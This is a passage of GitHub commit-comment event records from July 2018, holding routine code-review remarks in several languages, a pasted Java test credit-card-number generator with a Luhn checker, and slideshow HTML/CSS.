code.\r\n\r\n"}},"created_at":"2018-07-27T10:44:25Z"}
{"id":"8027904775","type":"CommitCommentEvent","actor":{"login":"ingokru"},"repo":{"name":"modell-aachen/ExportExcelPlugin"},"payload":{"comment":{"id":29856887,"position":47,"line":77,"path":"pub/System/ExportExcelPlugin/scripts/export_excel.js","commit_id":"e7e8bed070570f66ca51486280de21a5b2d6e8fb","created_at":"2018-07-27T10:46:09Z","updated_at":"2018-07-27T10:46:09Z","author_association":"NONE","body":"hier fehlt ein semikolon :-D"}},"created_at":"2018-07-27T10:46:09Z"}
{"id":"8027905936","type":"CommitCommentEvent","actor":{"login":"leo-yuriev"},"repo":{"name":"rurban/smhasher"},"payload":{"comment":{"id":29856890,"position":6,"line":86,"path":"main.cpp","commit_id":"9707b94d0228950b5de9ce1fbc434c2af6c4c8f5","created_at":"2018-07-27T10:46:26Z","updated_at":"2018-07-27T10:46:26Z","author_association":"CONTRIBUTOR","body":"I also do not understand why SHA1 gives the wrong result here in case MSVC."}},"created_at":"2018-07-27T10:46:26Z"}
{"id":"8027906575","type":"CommitCommentEvent","actor":{"login":"ntrel"},"repo":{"name":"atilaneves/automem"},"payload":{"comment":{"id":29856891,"position":7,"line":52,"path":"source/automem/utils.d","commit_id":"d507a5049652eb198deb4baa5db9d222f96c83ba","created_at":"2018-07-27T10:46:36Z","updated_at":"2018-07-27T10:46:36Z","author_association":"NONE","body":"Shouldn't this be `CB b;`?"}},"created_at":"2018-07-27T10:46:36Z"}
{"id":"8027906790","type":"CommitCommentEvent","actor":{"login":"ingokru"},"repo":{"name":"modell-aachen/ExportExcelPlugin"},"payload":{"comment":{"id":29856892,"position":6,"line":36,"path":"pub/System/ExportExcelPlugin/scripts/export_excel.js","commit_id":"e7e8bed070570f66ca51486280de21a5b2d6e8fb","created_at":"2018-07-27T10:46:40Z","updated_at":"2018-07-27T10:46:40Z","author_association":"NONE","body":"hier fehlt ein semikolon :-P"}},"created_at":"2018-07-27T10:46:40Z"}
{"id":"8027910789","type":"CommitCommentEvent","actor":{"login":"ingokru"},"repo":{"name":"modell-aachen/ExportExcelPlugin"},"payload":{"comment":{"id":29856903,"position":12,"line":41,"path":"pub/System/ExportExcelPlugin/scripts/export_excel.js","commit_id":"e7e8bed070570f66ca51486280de21a5b2d6e8fb","created_at":"2018-07-27T10:47:39Z","updated_at":"2018-07-27T10:47:39Z","author_association":"NONE","body":"Du könntest \"arr\" noch einen cooleren Namen geben..."}},"created_at":"2018-07-27T10:47:39Z"}
{"id":"8027912714","type":"CommitCommentEvent","actor":{"login":"maple3142"},"repo":{"name":"FlandreDaisuki/My-Browser-Extensions"},"payload":{"comment":{"id":29856911,"position":null,"line":null,"path":null,"commit_id":"9a984b9833fb43d797a6d8e933feda2ad3a79318","created_at":"2018-07-27T10:48:09Z","updated_at":"2018-07-27T10:48:09Z","author_association":"NONE","body":"請問一下 57 58 行用 `indexOf` 和 `slice` 有什麼特別用意嗎?\r\n看起來不就是 `split('=')` 的功能嗎?"}},"created_at":"2018-07-27T10:48:09Z"}
{"id":"8027915378","type":"CommitCommentEvent","actor":{"login":"docsteveharris"},"repo":{"name":"ropensci/cleanEHR"},"payload":{"comment":{"id":29856915,"position":null,"line":null,"path":null,"commit_id":"4a3904b7eed66210669b0f5ee82299f174290804","created_at":"2018-07-27T10:48:45Z","updated_at":"2018-07-27T10:48:45Z","author_association":"COLLABORATOR","body":"Logic looks OK. I note the automated tests are all failing. Is this related?"}},"created_at":"2018-07-27T10:48:45Z"}
{"id":"8027917407","type":"CommitCommentEvent","actor":{"login":"ingokru"},"repo":{"name":"modell-aachen/ExportExcelPlugin"},"payload":{"comment":{"id":29856919,"position":12,"line":41,"path":"pub/System/ExportExcelPlugin/scripts/export_excel.js","commit_id":"e7e8bed070570f66ca51486280de21a5b2d6e8fb","created_at":"2018-07-27T10:49:14Z","updated_at":"2018-07-27T10:49:14Z","author_association":"NONE","body":"Und brauchst du dafür überhaupt ein Array? du benutzt ja nur die größe oder?"}},"created_at":"2018-07-27T10:49:14Z"}
{"id":"8027918691","type":"CommitCommentEvent","actor":{"login":"Petertitirloloby"},"repo":{"name":"Petertitirloloby/excursion"},"payload":{"comment":{"id":29856923,"position":null,"line":null,"path":null,"commit_id":"a18fa45e177d421fb977d9d688786b670d051733","created_at":"2018-07-27T10:49:32Z","updated_at":"2018-07-27T10:49:32Z","author_association":"OWNER","body":"test"}},"created_at":"2018-07-27T10:49:32Z"}
{"id":"8027919255","type":"CommitCommentEvent","actor":{"login":"Kulicheg"},"repo":{"name":"Kulicheg/Arduibo-AY-8910-PSG-player"},"payload":{"comment":{"id":29856924,"position":null,"line":null,"path":null,"commit_id":"800bc2e196a950324886475065a785195a08f06d","created_at":"2018-07-27T10:49:40Z","updated_at":"2018-07-27T10:49:40Z","author_association":"OWNER","body":"Добавлена бвзовая поддержка чумового джогдайла.  Есть баг с возвращением назад первой позиции, сязаано с тем что почему-то  SD  стала считать первым файлом  в папке\"/\""}},"created_at":"2018-07-27T10:49:40Z"}
{"id":"8027922188","type":"CommitCommentEvent","actor":{"login":"Hootie81"},"repo":{"name":"g4klx/MMDVMHost"},"payload":{"comment":{"id":29856928,"position":33,"line":244,"path":"SerialController.cpp","commit_id":"40db88d5f8c7fd35129d7131d2f42a773b0a1889","created_at":"2018-07-27T10:50:21Z","updated_at":"2018-07-27T10:50:21Z","author_association":"CONTRIBUTOR","body":"Agreed, its a bit of a hack job. Unfortunately i don't have enough experience programming to figure it out.\r\n\r\nI'm open to suggestions, if you could give me a rough idea of how to get started with a separate class i can give it a go. "}},"created_at":"2018-07-27T10:50:21Z"}
{"id":"8027923620","type":"CommitCommentEvent","actor":{"login":"inlucky"},"repo":{"name":"inlucky/ts3"},"payload":{"comment":{"id":29856931,"position":null,"line":null,"path":null,"commit_id":"dacf2013bc56962b529988fb9d8eff56c00c2813","created_at":"2018-07-27T10:50:41Z","updated_at":"2018-07-27T10:50:41Z","author_association":"OWNER","body":"dsad"}},"created_at":"2018-07-27T10:50:41Z"}
{"id":"8027924417","type":"CommitCommentEvent","actor":{"login":"Kulicheg"},"repo":{"name":"Kulicheg/Arduibo-AY-8910-PSG-player"},"payload":{"comment":{"id":29856933,"position":null,"line":null,"path":null,"commit_id":"703cd7a50ba155f8f7d834f91f385046959bff08","created_at":"2018-07-27T10:50:53Z","updated_at":"2018-07-27T10:50:53Z","author_association":"OWNER","body":"Добавлена бвзовая поддержка чумового джогдайла. Есть баг с возвращением назад первой позиции, сязаано с тем что почему-то SD стала считать первым файлом в папке\"/\""}},"created_at":"2018-07-27T10:50:53Z"}
{"id":"8027927117","type":"CommitCommentEvent","actor":{"login":"oxij"},"repo":{"name":"NixOS/nixpkgs"},"payload":{"comment":{"id":29856935,"position":26,"line":26,"path":"pkgs/development/tools/misc/texinfo/common.nix","commit_id":"d531a1e96784cc64d17cef1892d1f747c7c02b10","created_at":"2018-07-27T10:51:31Z","updated_at":"2018-07-27T10:51:31Z","author_association":"CONTRIBUTOR","body":"IIRC `doCheck` fails without `interactive`, so I merged them.\n"}},"created_at":"2018-07-27T10:51:31Z"}
{"id":"8027930101","type":"CommitCommentEvent","actor":{"login":"danielsmith0612"},"repo":{"name":"danielsmith0612/dev-kernel"},"payload":{"comment":{"id":29856939,"position":null,"line":null,"path":null,"commit_id":"bcde3c382e5b61ddaa723e5079719ed0239b7d21","created_at":"2018-07-27T10:52:16Z","updated_at":"2018-07-27T10:52:16Z","author_association":"OWNER","body":"add license\r\n"}},"created_at":"2018-07-27T10:52:16Z"}
{"id":"8027934456","type":"CommitCommentEvent","actor":{"login":"FlandreDaisuki"},"repo":{"name":"FlandreDaisuki/My-Browser-Extensions"},"payload":{"comment":{"id":29856942,"position":null,"line":null,"path":null,"commit_id":"9a984b9833fb43d797a6d8e933feda2ad3a79318","created_at":"2018-07-27T10:53:20Z","updated_at":"2018-07-27T10:53:20Z","author_association":"OWNER","body":"@maple3142 cookie 內容 `=` 是合法字元\r\nsplit 掉就錯了\r\n簡單測試：`document.cookie = 'a==='`  // key 是 `a` value 是 `==`"}},"created_at":"2018-07-27T10:53:20Z"}
{"id":"8027941526","type":"CommitCommentEvent","actor":{"login":"mircealungu"},"repo":{"name":"flask-dashboard/Flask-MonitoringDashboard"},"payload":{"comment":{"id":29856960,"position":21,"line":184,"path":"flask_monitoringdashboard/database/__init__.py","commit_id":"66c715d71ea2adb62240ad9ebe45dea5f0e94c51","created_at":"2018-07-27T10:55:06Z","updated_at":"2018-07-27T10:55:06Z","author_association":"MEMBER","body":"sorry. how is this going work? \r\nin my python random.random is a function reference."}},"created_at":"2018-07-27T10:55:06Z"}
{"id":"8027944414","type":"CommitCommentEvent","actor":{"login":"VBramhasani"},"repo":{"name":"VBramhasani/TCH"},"payload":{"comment":{"id":29856969,"position":null,"line":null,"path":null,"commit_id":"139e6aaced036786bb8c8d5082f51fec5e0d0edc","created_at":"2018-07-27T10:55:44Z","updated_at":"2018-07-27T10:55:44Z","author_association":"OWNER","body":"Merge"}},"created_at":"2018-07-27T10:55:44Z"}
{"id":"8027945240","type":"CommitCommentEvent","actor":{"login":"carlcamusa"},"repo":{"name":"20H-Talent/ikigai-project-5-manuhdez"},"payload":{"comment":{"id":29856970,"position":null,"line":null,"path":null,"commit_id":"9ad8f33b637a209b43e2cb52e95fbd4c03072f3b","created_at":"2018-07-27T10:55:56Z","updated_at":"2018-07-27T10:55:56Z","author_association":"CONTRIBUTOR","body":":+1: :clap::clap: "}},"created_at":"2018-07-27T10:55:56Z"}
{"id":"8027946767","type":"CommitCommentEvent","actor":{"login":"martinda"},"repo":{"name":"jenkinsci/jep"},"payload":{"comment":{"id":29856972,"position":113,"line":113,"path":"jep/8/README.adoc","commit_id":"b7fe523450c1c34a57c61923695d3b9049280dff","created_at":"2018-07-27T10:56:19Z","updated_at":"2018-07-27T10:56:19Z","author_association":"CONTRIBUTOR","body":"How about writing it more like this:\r\n\r\nShould a project require access to non-free resources (software or hardware), the project mentors and student are expected to obtain the resources at no cost to the GSoC budget."}},"created_at":"2018-07-27T10:56:19Z"}
{"id":"8027950669","type":"CommitCommentEvent","actor":{"login":"martinda"},"repo":{"name":"jenkinsci/jep"},"payload":{"comment":{"id":29856978,"position":114,"line":114,"path":"jep/8/README.adoc","commit_id":"b7fe523450c1c34a57c61923695d3b9049280dff","created_at":"2018-07-27T10:57:16Z","updated_at":"2018-07-27T10:57:16Z","author_association":"CONTRIBUTOR","body":"payed -> paid"}},"created_at":"2018-07-27T10:57:16Z"}
{"id":"8027953721","type":"CommitCommentEvent","actor":{"login":"vincentfretin"},"repo":{"name":"assembl/assembl"},"payload":{"comment":{"id":29856990,"position":null,"line":null,"path":null,"commit_id":"18cf28fb60048c5c66680e1f014431bf2e1ce8c3","created_at":"2018-07-27T10:58:00Z","updated_at":"2018-07-27T10:58:00Z","author_association":"CONTRIBUTOR","body":"fixed in https://github.com/assembl/assembl/commit/b9a98db217fbeb0d7c475dbcbe62cbbd1cb911d7"}},"created_at":"2018-07-27T10:58:00Z"}
{"id":"8027955069","type":"CommitCommentEvent","actor":{"login":"martinda"},"repo":{"name":"jenkinsci/jep"},"payload":{"comment":{"id":29856994,"position":120,"line":120,"path":"jep/8/README.adoc","commit_id":"b7fe523450c1c34a57c61923695d3b9049280dff","created_at":"2018-07-27T10:58:22Z","updated_at":"2018-07-27T10:58:22Z","author_association":"CONTRIBUTOR","body":"payed -> paid"}},"created_at":"2018-07-27T10:58:22Z"}
{"id":"8027961171","type":"CommitCommentEvent","actor":{"login":"merscwog"},"repo":{"name":"micronaut-projects/micronaut-core"},"payload":{"comment":{"id":29857013,"position":30,"line":219,"path":"http/src/main/java/io/micronaut/http/uri/UriTemplate.java","commit_id":"4d9559d58fb6de530c2db326903b7597582d478d","created_at":"2018-07-27T10:59:52Z","updated_at":"2018-07-27T10:59:52Z","author_association":"NONE","body":"I know this has already been committed, but it seems like this should be a +1 instead of -1."}},"created_at":"2018-07-27T10:59:52Z"}
{"id":"8027964126","type":"CommitCommentEvent","actor":{"login":"TheUninvitedGuest"},"repo":{"name":"e2nIEE/pandapower"},"payload":{"comment":{"id":29857030,"position":null,"line":null,"path":null,"commit_id":"771bc6af25e55c0c6b6935c399132994e92fd27a","created_at":"2018-07-27T11:00:31Z","updated_at":"2018-07-27T11:00:31Z","author_association":"COLLABORATOR","body":"Cool :-)"}},"created_at":"2018-07-27T11:00:31Z"}
{"id":"8027965190","type":"CommitCommentEvent","actor":{"login":"sooosia"},"repo":{"name":"sooosia/CCCC"},"payload":{"comment":{"id":29857031,"position":null,"line":null,"path":null,"commit_id":"c2d8520bee1e0614b953431437bc42bbafea3876","created_at":"2018-07-27T11:00:47Z","updated_at":"2018-07-27T11:00:47Z","author_association":"OWNER","body":"import java.util.List;\r\nimport java.util.Stack;\r\nimport java.util.Vector;\r\n\r\n/**\r\n * See the license below. Obviously, this is not a Javascript credit card number\r\n * generator. However, The following class is a port of a Javascript credit card\r\n * number generator.\r\n *\r\n * @author robweber\r\n *\r\n */\r\npublic class RandomCreditCardNumberGenerator {\r\n\t/*\r\n\t * Javascript credit card number generator Copyright (C) 2006-2012 Graham King\r\n\t *\r\n\t * This program is free software; you can redistribute it and/or modify it\r\n\t * under the terms of the GNU General Public License as published by the\r\n\t * Free Software Foundation; either version 2 of the License, or (at your\r\n\t * option) any later version.\r\n\t *\r\n\t * This program is distributed in the hope that it will be useful, but\r\n\t * WITHOUT ANY WARRANTY; without even the implied warranty of\r\n\t * MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the GNU General\r\n\t * Public License for more details.\r\n\t *\r\n\t * You should have received a copy of the GNU General Public License along\r\n\t * with this program; if not, write to the Free Software Foundation, Inc.,\r\n\t * 51 Franklin Street, Fifth Floor, Boston, MA 02110-1301, USA.\r\n\t *\r\n\t * www.darkcoding.net\r\n\t */\r\n\r\n\tpublic static final String[] VISA_PREFIX_LIST = new String[] { \"4539\",\r\n\t\t\t\"4556\", \"4916\", \"4532\", \"4929\", \"40240071\", \"4485\", \"4716\", \"4\" };\r\n\r\n\tpublic static final String[] MASTERCARD_PREFIX_LIST = new String[] { \"51\",\r\n\t\t\t\"52\", \"53\", \"54\", \"55\", \"2221\", \"2222\", \"2223\", \"2224\", \"2225\", \"2226\", \"2227\", \"2228\", \"2229\", \"223\", \"224\", \"225\", \"226\", \"227\", \"228\", \"229\", \"23\", \"24\", \"25\", \"26\", \"270\", \"271\", \"2720\" };\r\n\r\n\tpublic static final String[] AMEX_PREFIX_LIST = new String[] { \"34\", \"37\" };\r\n\r\n\tpublic static final String[] DISCOVER_PREFIX_LIST = new String[] { \"6011\" };\r\n\r\n\tpublic static final String[] DINERS_PREFIX_LIST = new String[] { \"300\",\r\n\t\t\t\"301\", \"302\", \"303\", \"36\", \"38\" };\r\n\r\n\tpublic static final String[] ENROUTE_PREFIX_LIST = new String[] { \"2014\",\r\n\t\t\t\"2149\" };\r\n\r\n\tpublic static final String[] JCB_PREFIX_LIST = new String[] { \"35\" };\r\n\r\n\tpublic static final String[] VOYAGER_PREFIX_LIST = new String[] { \"8699\" };\r\n\r\n\tstatic String strrev(String str) {\r\n\t\tif (str == null)\r\n\t\t\treturn \"\";\r\n\t\tString revstr = \"\";\r\n\t\tfor (int i = str.length() - 1; i >= 0; i--) {\r\n\t\t\trevstr += str.charAt(i);\r\n\t\t}\r\n\r\n\t\treturn revstr;\r\n\t}\r\n\r\n\t/*\r\n\t * 'prefix' is the start of the CC number as a string, any number of digits.\r\n\t * 'length' is the length of the CC number to generate. Typically 13 or 16\r\n\t */\r\n\tstatic String completed_number(String prefix, int length) {\r\n\r\n\t\tString ccnumber = prefix;\r\n\r\n\t\t// generate digits\r\n\r\n\t\twhile (ccnumber.length() < (length - 1)) {\r\n\t\t\tccnumber += new Double(Math.floor(Math.random() * 10)).intValue();\r\n\t\t}\r\n\r\n\t\t// reverse number and convert to int\r\n\r\n\t\tString reversedCCnumberString = strrev(ccnumber);\r\n\r\n\t\tList<Integer> reversedCCnumberList = new Vector<Integer>();\r\n\t\tfor (int i = 0; i < reversedCCnumberString.length(); i++) {\r\n\t\t\treversedCCnumberList.add(new Integer(String\r\n\t\t\t\t\t.valueOf(reversedCCnumberString.charAt(i))));\r\n\t\t}\r\n\r\n\t\t// calculate sum\r\n\r\n\t\tint sum = 0;\r\n\t\tint pos = 0;\r\n\r\n\t\tInteger[] reversedCCnumber = reversedCCnumberList\r\n\t\t\t\t.toArray(new Integer[reversedCCnumberList.size()]);\r\n\t\twhile (pos < length - 1) {\r\n\r\n\t\t\tint odd = reversedCCnumber[pos] * 2;\r\n\t\t\tif (odd > 9) {\r\n\t\t\t\todd -= 9;\r\n\t\t\t}\r\n\r\n\t\t\tsum += odd;\r\n\r\n\t\t\tif (pos != (length - 2)) {\r\n\t\t\t\tsum += reversedCCnumber[pos + 1];\r\n\t\t\t}\r\n\t\t\tpos += 2;\r\n\t\t}\r\n\r\n\t\t// calculate check digit\r\n\r\n\t\tint checkdigit = new Double(\r\n\t\t\t\t((Math.floor(sum / 10) + 1) * 10 - sum) % 10).intValue();\r\n\t\tccnumber += checkdigit;\r\n\r\n\t\treturn ccnumber;\r\n\r\n\t}\r\n\r\n\tpublic static String[] credit_card_number(String[] prefixList, int length,\r\n\t\t\tint howMany) {\r\n\r\n\t\tStack<String> result = new Stack<String>();\r\n\t\tfor (int i = 0; i < howMany; i++) {\r\n\t\t\tint randomArrayIndex = (int) Math.floor(Math.random()\r\n\t\t\t\t\t* prefixList.length);\r\n\t\t\tString ccnumber = prefixList[randomArrayIndex];\r\n\t\t\tresult.push(completed_number(ccnumber, length));\r\n\t\t}\r\n\r\n\t\treturn result.toArray(new String[result.size()]);\r\n\t}\r\n\r\n\tpublic static String[] generateMasterCardNumbers(int howMany) {\r\n\t\treturn credit_card_number(MASTERCARD_PREFIX_LIST, 16, howMany);\r\n\t}\r\n\r\n\tpublic static String generateMasterCardNumber() {\r\n\t\treturn credit_card_number(MASTERCARD_PREFIX_LIST, 16, 1)[0];\r\n\t}\r\n\r\n\tpublic static boolean isValidCreditCardNumber(String creditCardNumber) {\r\n\t\tboolean isValid = false;\r\n\r\n\t\ttry {\r\n\t\t\tString reversedNumber = new StringBuffer(creditCardNumber)\r\n\t\t\t\t\t.reverse().toString();\r\n\t\t\tint mod10Count = 0;\r\n\t\t\tfor (int i = 0; i < reversedNumber.length(); i++) {\r\n\t\t\t\tint augend = Integer.parseInt(String.valueOf(reversedNumber\r\n\t\t\t\t\t\t.charAt(i)));\r\n\t\t\t\tif (((i + 1) % 2) == 0) {\r\n\t\t\t\t\tString productString = String.valueOf(augend * 2);\r\n\t\t\t\t\taugend = 0;\r\n\t\t\t\t\tfor (int j = 0; j < productString.length(); j++) {\r\n\t\t\t\t\t\taugend += Integer.parseInt(String.valueOf(productString\r\n\t\t\t\t\t\t\t\t.charAt(j)));\r\n\t\t\t\t\t}\r\n\t\t\t\t}\r\n\r\n\t\t\t\tmod10Count += augend;\r\n\t\t\t}\r\n\r\n\t\t\tif ((mod10Count % 10) == 0) {\r\n\t\t\t\tisValid = true;\r\n\t\t\t}\r\n\t\t} catch (NumberFormatException e) {\r\n\t\t}\r\n\r\n\t\treturn isValid;\r\n\t}\r\n\r\n\tpublic static void main(String[] args) {\r\n\t\tint howMany = 0;\r\n\t\ttry {\r\n\t\t\thowMany = Integer.parseInt(args[0]);\r\n\t\t} catch (Exception e) {\r\n\t\t\tSystem.err\r\n\t\t\t\t\t.println(\"Usage error. You need to supply a numeric argument (ex: 500000)\");\r\n\t\t}\r\n\t\tString[] creditcardnumbers = generateMasterCardNumbers(howMany);\r\n\t\tfor (int i = 0; i < creditcardnumbers.length; i++) {\r\n\t\t\tSystem.out.println(creditcardnumbers[i]\r\n\t\t\t\t\t+ \":\"\r\n\t\t\t\t\t+ (isValidCreditCardNumber(creditcardnumbers[i]) ? \"valid\"\r\n\t\t\t\t\t\t\t: \"invalid\"));\r\n\t\t}\r\n\t}\r\n}\r\n"}},"created_at":"2018-07-27T11:00:47Z"}
{"id":"8027972062","type":"CommitCommentEvent","actor":{"login":"binarin"},"repo":{"name":"NixOS/nixpkgs"},"payload":{"comment":{"id":29857043,"position":26,"line":26,"path":"pkgs/development/tools/misc/texinfo/common.nix","commit_id":"d531a1e96784cc64d17cef1892d1f747c7c02b10","created_at":"2018-07-27T11:02:30Z","updated_at":"2018-07-27T11:02:30Z","author_association":"CONTRIBUTOR","body":"Would you mind if I restore this for documentation purposes? So it can be clealry seen that this is dependency needed only for tests."}},"created_at":"2018-07-27T11:02:30Z"}
{"id":"8027976187","type":"CommitCommentEvent","actor":{"login":"ged-odoo"},"repo":{"name":"odoo/odoo"},"payload":{"comment":{"id":29857056,"position":null,"line":null,"path":null,"commit_id":"2b3017974bc7cd4b3a74f83c956224cfe4e5a918","created_at":"2018-07-27T11:03:35Z","updated_at":"2018-07-27T11:03:35Z","author_association":"CONTRIBUTOR","body":"bah, only 34,498 additions and 36,890 deletions...  not very impressive... I am pretty sure that I beat you on that regard"}},"created_at":"2018-07-27T11:03:35Z"}
{"id":"8027976301","type":"CommitCommentEvent","actor":{"login":"danikf"},"repo":{"name":"danikf/tik4net"},"payload":{"comment":{"id":29857058,"position":null,"line":null,"path":null,"commit_id":"47e3730b10550f9fd53f6549216d4be94a77b664","created_at":"2018-07-27T11:03:37Z","updated_at":"2018-07-27T11:03:37Z","author_association":"OWNER","body":"Connected with #32 "}},"created_at":"2018-07-27T11:03:37Z"}
{"id":"8027990037","type":"CommitCommentEvent","actor":{"login":"maple3142"},"repo":{"name":"FlandreDaisuki/My-Browser-Extensions"},"payload":{"comment":{"id":29857093,"position":null,"line":null,"path":null,"commit_id":"9a984b9833fb43d797a6d8e933feda2ad3a79318","created_at":"2018-07-27T11:07:08Z","updated_at":"2018-07-27T11:07:08Z","author_association":"NONE","body":"@FlandreDaisuki 原來，我還以為 cookie 能像是 querystring 那樣 parse"}},"created_at":"2018-07-27T11:07:08Z"}
{"id":"8027993013","type":"CommitCommentEvent","actor":{"login":"vidhyakandsasamy"},"repo":{"name":"vidhyakandsasamy/vidhyakandasamy"},"payload":{"comment":{"id":29857100,"position":null,"line":null,"path":null,"commit_id":"bd00ae7dc313f5844ebbf9720d15e3e6a7e1a7e4","created_at":"2018-07-27T11:07:54Z","updated_at":"2018-07-27T11:07:54Z","author_association":"OWNER","body":"<!-- Slideshow container -->\r\n<div class=\"slideshow-container\">\r\n\r\n  <!-- Full-width images with number and caption text -->\r\n  <div class=\"mySlides fade\">\r\n    <div class=\"numbertext\">1 / 3</div>\r\n    <img src=\"img1.jpg\" style=\"width:100%\">\r\n    <div class=\"text\">Caption Text</div>\r\n  </div>\r\n\r\n  <div class=\"mySlides fade\">\r\n    <div class=\"numbertext\">2 / 3</div>\r\n    <img src=\"img2.jpg\" style=\"width:100%\">\r\n    <div class=\"text\">Caption Two</div>\r\n  </div>\r\n\r\n  <div class=\"mySlides fade\">\r\n    <div class=\"numbertext\">3 / 3</div>\r\n    <img src=\"img3.jpg\" style=\"width:100%\">\r\n    <div class=\"text\">Caption Three</div>\r\n  </div>\r\n\r\n  <!-- Next and previous buttons -->\r\n  <a class=\"prev\" onclick=\"plusSlides(-1)\">&#10094;</a>\r\n  <a class=\"next\" onclick=\"plusSlides(1)\">&#10095;</a>\r\n</div>\r\n<br>\r\n\r\n<!-- The dots/circles -->\r\n<div style=\"text-align:center\">\r\n  <span class=\"dot\" onclick=\"currentSlide(1)\"></span> \r\n  <span class=\"dot\" onclick=\"currentSlide(2)\"></span> \r\n  <span class=\"dot\" onclick=\"currentSlide(3)\"></span> \r\n</div>\r\nStep 2) Add CSS:\r\nStyle the next and previous buttons, the caption text and the dots:\r\n\r\nExample\r\n* {box-sizing:border-box}\r\n\r\n/* Slideshow container */\r\n.slideshow-container {\r\n  max-width: 1000px;\r\n  position: relative;\r\n  margin: auto;\r\n}\r\n\r\n/* Hide the images by default */\r\n.mySlides {\r\n    display: none;\r\n}\r\n\r\n/* Next & previous buttons */\r\n.prev, .next {\r\n  cursor: pointer;\r\n  position: absolute;\r\n  top: 50%;\r\n  width: auto;\r\n  margin-top: -22px;\r\n  padding: 16px;\r\n  color: white;\r\n  font-weight: bold;\r\n  font-size: 18px;\r\n  transition: 0.6s ease;\r\n  border-radius: 0 3px 3px 0;\r\n}\r\n\r\n/* Position the \"next button\" to the right */\r\n.next {\r\n  right: 0;\r\n  border-radius: 3px 0 0 3px;\r\n}\r\n\r\n/* On hover, add a black background color with a little bit see-through */\r\n.prev:hover, .next:hover {\r\n  background-color: rgba(0,0,0,0.8);\r\n}\r\n\r\n/* Caption text */\r\n.text {\r\n  color: #f2f2f2;\r\n  font-size: 15px;\r\n  padding: 8px 12px;\r\n  position: absolute;\r\n  bottom: 8px;\r\n  width: 100%;\r\n  text-align: center;\r\n}\r\n\r\n/* Number text (1/3 etc) */\r\n.numbertext {\r\n  color: #f2f2f2;\r\n  font-size: 12px;\r\n  padding: 8px 12px;\r\n  position: absolute;\r\n  top: 0;\r\n}\r\n\r\n/* The dots/bullets/indicators */\r\n.dot {\r\n  cursor: pointer;\r\n  height: 15px;\r\n  width: 15px;\r\n  margin: 0 2px;\r\n  background-color: #bbb;\r\n  border-radius: 50%;\r\n  display: inline-block;\r\n  transition: background-color 0.6s ease;\r\n}\r\n\r\n.active, .dot:hover {\r\n  background-color: #717171;\r\n}\r\n\r\n/* Fading animation */\r\n.fade {\r\n  -webkit-animation-name: fade;\r\n  -webkit-animation-duration: 1.5s;\r\n  animation-name: fade;\r\n  animation-duration: 1.5s;\r\n}\r\n\r\n@-webkit-keyframes fade {\r\n  from {opacity: .4} \r\n  to {opacity: 1}\r\n}\r\n\r\n@keyframes fade {\r\n  from {opacity: .4} \r\n  to {opacity: 1}\r\n}\r\n"}},"created_at":"2018-07-27T11:07:54Z"}
{"id":"8027993508","type":"CommitCommentEvent","actor":{"login":"nulle"},"repo":{"name":"nulle/colpick"},"payload":{"comment":{"id":29857101,"position":null,"line":null,"path":null,"commit_id":"8252fd199f82da52d9231207da7754b6d0615f6f","created_at":"2018-07-27T11:08:02Z","updated_at":"2018-07-27T11:08:02Z","author_association":"OWNER","body":"@GrishaevPavel thanks for pointing it out. It's fixed now in 3.1.2 (https://github.com/nulle/colpick/commit/fedb7bea07bfef75fe4343c5f3f4ef84f3cbb1e3)"}},"created_at":"2018-07-27T11:08:02Z"}
{"id":"8027994498","type":"CommitCommentEvent","actor":{"login":"Ramachinna"},"repo":{"name":"sivadasu88/Toobtech.UserManagement"},"payload":{"comment":{"id":29857102,"position":null,"line":null,"path":null,"commit_id":"bb5b70ccb37af4f17a91ca0f910594591e9abded","created_at":"2018-07-27T11:08:17Z","updated_at":"2018-07-27T11:08:17Z","author_association":"COLLABORATOR","body":"good"}},"created_at":"2018-07-27T11:08:17Z"}
{"id":"8027996384","type":"CommitCommentEvent","actor":{"login":"neomonkeus"},"repo":{"name":"niftools/nifxml"},"payload":{"comment":{"id":29857104,"position":null,"line":null,"path":null,"commit_id":"97a81c8e501a31d3906fedca03b8ff89f1de3181","created_at":"2018-07-27T11:08:45Z","updated_at":"2018-07-27T11:08:45Z","author_association":"MEMBER","body":"Thanks for the clarification"}},"created_at":"2018-07-27T11:08:45Z"}
{"id":"8027996834","type":"CommitCommentEvent","actor":{"login":"lotchi"},"repo":{"name":"lotchi/association"},"payload":{"comment":{"id":29857106,"position":null,"line":null,"path":null,"commit_id":"fe6647a8b283aaa7e34dc910bbf6a52fcd0a4164","created_at":"2018-07-27T11:08:53Z","updated_at":"2018-07-27T11:08:53Z","author_association":"OWNER","body":"\r\n[test2.txt](https://github.com/lotchi/association/files/2235537/test2.txt)\r\n[util2.txt](https://github.com/lotchi/association/files/2235538/util2.txt)\r\n"}},"created_at":"2018-07-27T11:08:53Z"}
{"id":"8027997721","type":"CommitCommentEvent","actor":{"login":"lotchi"},"repo":{"name":"lotchi/association"},"payload":{"comment":{"id":29857112,"position":null,"line":null,"path":null,"commit_id":"fe6647a8b283aaa7e34dc910bbf6a52fcd0a4164","created_at":"2018-07-27T11:09:07Z","updated_at":"2018-07-27T11:09:07Z","author_association":"OWNER","body":"test files "}},"created_at":"2018-07-27T11:09:07Z"}
{"id":"8027998463","type":"CommitCommentEvent","actor":{"login":"oleg-nenashev"},"repo":{"name":"jenkinsci/jep"},"payload":{"comment":{"id":29857116,"position":120,"line":120,"path":"jep/8/README.adoc","commit_id":"b7fe523450c1c34a57c61923695d3b9049280dff","created_at":"2018-07-27T11:09:17Z","updated_at":"2018-07-27T11:09:17Z","author_association":"MEMBER","body":"Thanks Martin! I will address it, but it make sense to just do edits in web\nUI and then propose a PR\n\nOn Fri, Jul 27, 2018, 13:58 martinda <notifications@github.com> wrote:\n\n> payed -> paid\n>\n> —\n> You are receiving this because you are subscribed to this thread.\n> Reply to this email directly, view it on GitHub\n> <https://github.com/jenkinsci/jep/commit/b7fe523450c1c34a57c61923695d3b9049280dff#commitcomment-29856994>,\n> or mute the thread\n> <https://github.com/notifications/unsubscribe-auth/AC3IoDkoUaAA8w_jaTSVmi_j_XFC0o3nks5uKvJggaJpZM4Vitmj>\n> .\n>\n"}},"created_at":"2018-07-27T11:09:17Z"}
